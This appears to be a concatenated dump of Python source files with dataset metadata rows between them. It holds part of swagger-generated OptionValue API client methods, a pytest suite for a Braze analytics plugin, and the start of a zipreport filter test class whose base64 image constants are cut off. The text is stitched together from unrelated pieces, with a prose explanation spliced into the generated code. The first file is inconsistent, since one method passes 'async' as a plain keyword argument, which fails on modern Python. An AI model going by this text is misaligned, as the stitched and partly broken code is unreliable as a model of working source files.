If the method is called asynchronously,
returns the request thread.
"""
all_params = ['option_value_id', 'option_value']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
# verify the required parameter 'option_value_id' is set
if ('option_value_id' not in params or
params['option_value_id'] is None):
raise ValueError("Missing the required parameter `option_value_id` when calling `replace_option_value_by_id`")
# verify the required parameter 'option_value' is set
if ('option_value' not in params or
params['option_value'] is None):
raise ValueError("Missing the required parameter `option_value` when calling `replace_option_value_by_id`")
collection_formats = {}
path_params = {}
if 'option_value_id' in params:
path_params['optionValueId'] = params['option_value_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'option_value' in params:
body_params = params['option_value']
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/optionValues/{optionValueId}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OptionValue',
auth_settings=auth_settings,
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats,
            # 'async' became a reserved word in Python 3.7, so it is passed
            # via ** (and last, which also keeps Python 2 happy).
            **{'async': params.get('async')})
@classmethod
def update_option_value_by_id(cls, option_value_id, option_value, **kwargs):
"""Update OptionValue
Update attributes of OptionValue
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.update_option_value_by_id(option_value_id, option_value, async=True)
>>> result = thread.get()
:param async bool
:param str option_value_id: ID of optionValue to update. (required)
:param OptionValue option_value: Attributes of optionValue to update. (required)
:return: OptionValue
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return cls._update_option_value_by_id_with_http_info(option_value_id, option_value, **kwargs)
else:
(data) = cls._update_option_value_by_id_with_http_info(option_value_id, option_value, **kwargs)
return data
@classmethod
def _update_option_value_by_id_with_http_info(cls, option_value_id, option_value, **kwargs):
"""Update OptionValue
Update attributes of OptionValue
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.update_option_value_by_id_with_http_info(option_value_id, option_value, async=True)
>>> result = thread.get()
:param async bool
:param str option_value_id: ID of optionValue to update. (required)
:param OptionValue option_value: Attributes of optionValue to update. (required)
:return: OptionValue
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['option_value_id', 'option_value']
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
query_params = []
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
query_params.append((key, val))
params[key] = val
del params['kwargs']
# verify the required parameter 'option_value_id' is set
if ('option_value_id' not in params or
params['option_value_id'] is None):
raise ValueError("Missing the required parameter `option_value_id` when calling `update_option_value_by_id`")
# verify the required parameter 'option_value' is set
if ('option_value' not in params or
params['option_value'] is None):
raise ValueError("Missing the required parameter `option_value` when calling `update_option_value_by_id`")
collection_formats = {}
path_params = {}
if 'option_value_id' in params:
path_params['optionValueId'] = params['option_value_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'option_value' in params:
body_params = params['option_value']
# HTTP header `Accept`
header_params['Accept'] = cls.get_api_client().select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = cls.get_api_client().select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return cls.get_api_client().call_api(
'/optionValues/{optionValueId}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OptionValue',
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
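The generated wrapper above dispatches on an `async` flag in `kwargs`: synchronous calls return the deserialized data directly, while async calls return a thread-like object whose `get()` yields the result. Note that `async` became a reserved keyword in Python 3.7, so on modern interpreters the flag can only be supplied via dict unpacking. A minimal standalone sketch of that dispatch pattern (hypothetical stand-in for `call_api`, using `concurrent.futures` in place of the client's thread pool):

```python
from concurrent.futures import ThreadPoolExecutor

_executor = ThreadPoolExecutor(max_workers=2)

def _update_with_http_info(option_value_id, option_value):
    # Stand-in for the real call_api() HTTP round trip.
    return {'id': option_value_id, **option_value}

def update_option_value_by_id(option_value_id, option_value, **kwargs):
    # Mirrors the generated dispatch: async flag -> future, otherwise -> data.
    if kwargs.get('async'):
        return _executor.submit(_update_with_http_info, option_value_id, option_value)
    return _update_with_http_info(option_value_id, option_value)

# Synchronous call returns the payload directly:
data = update_option_value_by_id('ov-1', {'name': 'Large'})

# 'async' is a keyword since Python 3.7, so pass the flag via unpacking:
future = update_option_value_by_id('ov-1', {'name': 'Large'}, **{'async': True})
result = future.result()  # analogous to thread.get() in the docstrings
```

Later swagger-codegen releases renamed this flag to `async_req` for exactly this reason.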
| 33.428738 | 122 | 0.611882 | 3,300 | 28,615 | 5.018788 | 0.057576 | 0.098297 | 0.047096 | 0.029888 | 0.863724 | 0.832448 | 0.820613 | 0.807813 | 0.801413 | 0.794952 | 0 | 0.000448 | 0.29813 | 28,615 | 855 | 123 | 33.467836 | 0.824188 | 0.030019 | 0 | 0.655022 | 0 | 0 | 0.144837 | 0.036288 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.010917 | null | null | 0.004367 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7771c3204d1db37eae3cfc43e26f24d1a6bdc2de | 11,008 | py | Python | packages/plugin-braze/tests/test_braze.py | amplitude/itly-sdk-python | ee6b1a20a8eab901a7ff897e4980a824388df6c4 | [
"MIT"
] | 1 | 2020-11-16T19:42:53.000Z | 2020-11-16T19:42:53.000Z | packages/plugin-braze/tests/test_braze.py | iterativelyhq/itly-sdk-python | ee6b1a20a8eab901a7ff897e4980a824388df6c4 | [
"MIT"
] | null | null | null | packages/plugin-braze/tests/test_braze.py | iterativelyhq/itly-sdk-python | ee6b1a20a8eab901a7ff897e4980a824388df6c4 | [
"MIT"
] | null | null | null | import json
import re
import time
from datetime import timedelta
from typing import List, Any
from pytest_httpserver import HTTPServer
from itly_plugin_braze import BrazePlugin, BrazeOptions
from itly_sdk import PluginLoadOptions, Environment, Properties, Event, Logger
time_short = 0.1
timedelta_max = timedelta(seconds=999)
identify_properties = Properties(item1='identify', item2=2)
event_1 = Event('event-1', Properties(item1='value1', item2=1))
event_2 = Event('event-2', Properties(item1='value2', item2=2))
plugin_load_options = PluginLoadOptions(environment=Environment.DEVELOPMENT, logger=Logger.NONE)
def test_Id_BrazePlugin_IsBraze():
p = BrazePlugin('My-Key', BrazeOptions(base_url=''))
assert p.id() == 'braze'
def test_Identify_Immediate_Queued(httpserver: HTTPServer):
httpserver.expect_request(re.compile('/users/track')).respond_with_data()
p = BrazePlugin('My-Key',
BrazeOptions(base_url=httpserver.url_for(''), flush_queue_size=100, flush_interval=timedelta_max))
p.load(plugin_load_options)
p.identify("user-1", identify_properties)
p.identify("user-2", identify_properties)
p.identify("user-3", identify_properties)
time.sleep(time_short)
requests = _get_cleaned_requests(httpserver)
assert requests == []
p.shutdown()
def test_Track_Immediate_Queued(httpserver: HTTPServer):
httpserver.expect_request(re.compile('/users/track')).respond_with_data()
p = BrazePlugin('My-Key',
BrazeOptions(base_url=httpserver.url_for(''), flush_queue_size=100, flush_interval=timedelta_max))
p.load(plugin_load_options)
p.track("user-1", event_1)
p.track("user-1", event_2)
p.track("user-2", event_1)
time.sleep(time_short)
requests = _get_cleaned_requests(httpserver)
assert requests == []
p.shutdown()
def test_TrackAndIdentify_Immediate_Queued(httpserver: HTTPServer):
httpserver.expect_request(re.compile('/users/track')).respond_with_data()
p = BrazePlugin('My-Key',
BrazeOptions(base_url=httpserver.url_for(''), flush_queue_size=100, flush_interval=timedelta_max))
p.load(plugin_load_options)
p.track("user-1", event_1)
p.identify("user-3", identify_properties)
p.track("user-2", event_1)
time.sleep(time_short)
requests = _get_cleaned_requests(httpserver)
assert requests == []
p.shutdown()
def test_Identify_ExceedQueueSize_Flushed(httpserver: HTTPServer):
httpserver.expect_request(re.compile('/users/track')).respond_with_data()
p = BrazePlugin('My-Key',
BrazeOptions(base_url=httpserver.url_for(''), flush_queue_size=2, flush_interval=timedelta_max))
p.load(plugin_load_options)
p.identify("user-1", identify_properties)
p.identify("user-2", identify_properties)
time.sleep(time_short)
requests = _get_cleaned_requests(httpserver)
assert requests == [
{
'attributes': [
{'external_id': 'user-1', 'item1': 'identify', 'item2': 2},
{'external_id': 'user-2', 'item1': 'identify', 'item2': 2},
],
},
]
p.shutdown()
def test_Track_ExceedQueueSize_Flushed(httpserver: HTTPServer):
httpserver.expect_request(re.compile('/users/track')).respond_with_data()
p = BrazePlugin('My-Key',
BrazeOptions(base_url=httpserver.url_for(''), flush_queue_size=2, flush_interval=timedelta_max))
p.load(plugin_load_options)
p.track("user-1", event_1)
p.track("user-2", event_2)
time.sleep(time_short)
requests = _get_cleaned_requests(httpserver)
assert requests == [
{
'events': [
{'external_id': 'user-1', 'name': 'event-1', 'properties': {'item1': 'value1', 'item2': 1}},
{'external_id': 'user-2', 'name': 'event-2', 'properties': {'item1': 'value2', 'item2': 2}},
],
},
]
p.shutdown()
def test_TrackAndIdentify_ExceedQueueSize_Flushed(httpserver: HTTPServer):
httpserver.expect_request(re.compile('/users/track')).respond_with_data()
p = BrazePlugin('My-Key',
BrazeOptions(base_url=httpserver.url_for(''), flush_queue_size=3, flush_interval=timedelta_max))
p.load(plugin_load_options)
p.track("user-1", event_1)
p.identify("user-1", identify_properties)
p.track("user-2", event_2)
time.sleep(time_short)
requests = _get_cleaned_requests(httpserver)
assert requests == [
{
'attributes': [
{'external_id': 'user-1', 'item1': 'identify', 'item2': 2},
],
'events': [
{'external_id': 'user-1', 'name': 'event-1', 'properties': {'item1': 'value1', 'item2': 1}},
{'external_id': 'user-2', 'name': 'event-2', 'properties': {'item1': 'value2', 'item2': 2}},
],
},
]
p.shutdown()
def test_Identify_ExceedFlushInterval_Flushed(httpserver: HTTPServer):
httpserver.expect_request(re.compile('/users/track')).respond_with_data()
flush_interval = timedelta(milliseconds=300)
p = BrazePlugin('My-Key',
BrazeOptions(base_url=httpserver.url_for(''), flush_queue_size=100, flush_interval=flush_interval))
p.load(plugin_load_options)
p.identify("user-1", identify_properties)
p.identify("user-2", identify_properties)
time.sleep(flush_interval.total_seconds() + time_short)
requests = _get_cleaned_requests(httpserver)
assert requests == [
{
'attributes': [
{'external_id': 'user-1', 'item1': 'identify', 'item2': 2},
{'external_id': 'user-2', 'item1': 'identify', 'item2': 2},
],
},
]
p.shutdown()
def test_Track_ExceedFlushInterval_Flushed(httpserver: HTTPServer):
httpserver.expect_request(re.compile('/users/track')).respond_with_data()
flush_interval = timedelta(milliseconds=300)
p = BrazePlugin('My-Key',
BrazeOptions(base_url=httpserver.url_for(''), flush_queue_size=100, flush_interval=flush_interval))
p.load(plugin_load_options)
p.track("user-1", event_1)
p.track("user-2", event_2)
time.sleep(flush_interval.total_seconds() + time_short)
requests = _get_cleaned_requests(httpserver)
assert requests == [
{
'events': [
{'external_id': 'user-1', 'name': 'event-1', 'properties': {'item1': 'value1', 'item2': 1}},
{'external_id': 'user-2', 'name': 'event-2', 'properties': {'item1': 'value2', 'item2': 2}},
],
},
]
p.shutdown()
def test_TrackAndIdentify_ExceedFlushInterval_Flushed(httpserver: HTTPServer):
httpserver.expect_request(re.compile('/users/track')).respond_with_data()
flush_interval = timedelta(milliseconds=300)
p = BrazePlugin('My-Key',
BrazeOptions(base_url=httpserver.url_for(''), flush_queue_size=100, flush_interval=flush_interval))
p.load(plugin_load_options)
p.track("user-1", event_1)
p.identify("user-1", identify_properties)
p.track("user-2", event_2)
time.sleep(flush_interval.total_seconds() + time_short)
requests = _get_cleaned_requests(httpserver)
assert requests == [
{
'attributes': [
{'external_id': 'user-1', 'item1': 'identify', 'item2': 2},
],
'events': [
{'external_id': 'user-1', 'name': 'event-1', 'properties': {'item1': 'value1', 'item2': 1}},
{'external_id': 'user-2', 'name': 'event-2', 'properties': {'item1': 'value2', 'item2': 2}},
],
},
]
p.shutdown()
def test_TrackAndIdentify_ExplicitFlush_Flushed(httpserver: HTTPServer):
httpserver.expect_request(re.compile('/users/track')).respond_with_data()
p = BrazePlugin('My-Key',
BrazeOptions(base_url=httpserver.url_for(''), flush_queue_size=100, flush_interval=timedelta_max))
p.load(plugin_load_options)
p.track("user-1", event_1)
p.identify("user-1", identify_properties)
p.track("user-2", event_2)
p.flush()
time.sleep(time_short)
requests = _get_cleaned_requests(httpserver)
assert requests == [
{
'attributes': [
{'external_id': 'user-1', 'item1': 'identify', 'item2': 2},
],
'events': [
{'external_id': 'user-1', 'name': 'event-1', 'properties': {'item1': 'value1', 'item2': 1}},
{'external_id': 'user-2', 'name': 'event-2', 'properties': {'item1': 'value2', 'item2': 2}},
],
},
]
p.shutdown()
def test_TrackAndIdentify_Shutdown_Flushed(httpserver: HTTPServer):
httpserver.expect_request(re.compile('/users/track')).respond_with_data()
p = BrazePlugin('My-Key',
BrazeOptions(base_url=httpserver.url_for(''), flush_queue_size=100, flush_interval=timedelta_max))
p.load(plugin_load_options)
p.track("user-1", event_1)
p.identify("user-1", identify_properties)
p.track("user-2", event_2)
time.sleep(time_short)
p.shutdown()
requests = _get_cleaned_requests(httpserver)
assert requests == [
{
'attributes': [
{'external_id': 'user-1', 'item1': 'identify', 'item2': 2},
],
'events': [
{'external_id': 'user-1', 'name': 'event-1', 'properties': {'item1': 'value1', 'item2': 1}},
{'external_id': 'user-2', 'name': 'event-2', 'properties': {'item1': 'value2', 'item2': 2}},
],
},
]
def test_TrackAndIdentify_ObjectAndArrayProperties_Stringified(httpserver: HTTPServer):
httpserver.expect_request(re.compile('/users/track')).respond_with_data()
p = BrazePlugin('My-Key',
BrazeOptions(base_url=httpserver.url_for(''), flush_queue_size=100, flush_interval=timedelta_max))
p.load(plugin_load_options)
p.identify("user-1", Properties(item1=[11, 'value2'], item2={"a": True, "b": 17}))
p.track("user-2", Event('event-1', Properties(item1=['value1', 'value2'], item2={"a": 1, "b": "test"})))
p.flush()
requests = _get_cleaned_requests(httpserver)
assert requests == [
{
'attributes': [
{'external_id': 'user-1', 'item1': '[11, "value2"]', 'item2': '{"a": true, "b": 17}'},
],
'events': [
{
'external_id': 'user-2', 'name': 'event-1',
'properties': {'item1': '["value1", "value2"]', 'item2': '{"a": 1, "b": "test"}'},
},
],
},
]
p.shutdown()
def _get_cleaned_requests(httpserver: Any) -> List[Any]:
    requests = [json.loads(data) for data in httpserver.collected_data]
    # Event timestamps vary per run; drop them so the assertions stay deterministic.
    for request in requests:
        for event in request.get('events', []):
            del event['time']
    return requests
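The stringification test above (`test_TrackAndIdentify_ObjectAndArrayProperties_Stringified`) expects list and dict property values to arrive as their JSON encodings. The exact expected strings match what `json.dumps` produces with default separators, which is presumably what the plugin applies to non-scalar properties:

```python
import json

# JSON encoding reproduces exactly the strings asserted in the test:
assert json.dumps([11, "value2"]) == '[11, "value2"]'
assert json.dumps({"a": True, "b": 17}) == '{"a": true, "b": 17}'  # Python bools become lowercase JSON
assert json.dumps({"a": 1, "b": "test"}) == '{"a": 1, "b": "test"}'
```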
| 38.897527 | 119 | 0.62182 | 1,252 | 11,008 | 5.232428 | 0.078275 | 0.022897 | 0.047016 | 0.033735 | 0.879102 | 0.870859 | 0.864143 | 0.845825 | 0.838651 | 0.838651 | 0 | 0.027813 | 0.219386 | 11,008 | 282 | 120 | 39.035461 | 0.734551 | 0 | 0 | 0.702811 | 0 | 0 | 0.153161 | 0 | 0 | 0 | 0 | 0 | 0.052209 | 1 | 0.056225 | false | 0 | 0.032129 | 0 | 0.092369 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7ac8abf44f705d34ac30db21058a3a3f85c80b8b | 16,028 | py | Python | tests/render/filters/base.py | calibre12/zipreport | e6b48c999c530e16600842847a17f650002a0e13 | [
"MIT"
] | 12 | 2020-10-15T09:02:31.000Z | 2021-08-13T09:03:29.000Z | tests/render/filters/base.py | calibre12/zipreport | e6b48c999c530e16600842847a17f650002a0e13 | [
"MIT"
] | 1 | 2020-11-26T16:49:31.000Z | 2020-11-29T16:00:34.000Z | tests/render/filters/base.py | calibre12/zipreport | e6b48c999c530e16600842847a17f650002a0e13 | [
"MIT"
] | 2 | 2020-11-16T17:25:25.000Z | 2022-03-01T12:19:31.000Z | import os
import tempfile
from html.parser import HTMLParser
from pathlib import Path
from shutil import rmtree
from tests.utils import RPT_FILTER_EXAMPLE_PATH
from zipreport.report import ReportFileBuilder, ReportFileLoader
class JinjaFilterTest:
temp_dir = '/tmp'
# pre-generated images, for convenience
png_b64_image = b'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'
jpg_b64_image = b'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
